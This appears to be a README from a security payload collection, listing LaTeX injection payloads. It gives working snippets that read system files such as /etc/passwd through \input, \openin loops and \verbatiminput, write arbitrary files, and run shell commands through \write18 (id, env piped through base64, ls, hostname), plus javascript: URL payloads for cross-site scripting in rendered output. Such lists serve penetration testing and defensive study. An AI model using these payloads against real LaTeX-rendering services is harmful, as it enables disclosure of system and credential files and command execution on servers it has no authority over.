Stefan Friese 4427517c17 | ||
---|---|---|
.. | ||
README.md |
README.md
LaTex Injection
Read file
Read file and interpret the LaTeX code in it:
\input{/etc/passwd}
\include{somefile} # load .tex file (somefile.tex)
Read single lined file:
\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file
Read multiple lined file:
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file
Read text file, without interpreting the content, it will only paste raw file content:
\usepackage{verbatim}
\verbatiminput{/etc/passwd}
Write file
Write single lined file:
\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\write\outfile{Line 2}
\write\outfile{I like trains}
\closeout\outfile
Command execution
The output of the command will be redirected to stdout, therefore you need to use a temp file to get it.
\immediate\write18{id > output}
\input{output}
If you get any LaTex error, consider using base64 to get the result without bad characters (or use \verbatiminput
):
\immediate\write18{env | base64 > test.tex}
\input{text.tex}
\input|ls|base64
\input{|"/bin/hostname"}
Cross Site Scripting
From @EdOverflow
\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}
Live example at http://payontriage.com/xss.php?xss=$\href{javascript:alert(1)}{Frogs%20find%20bugs}$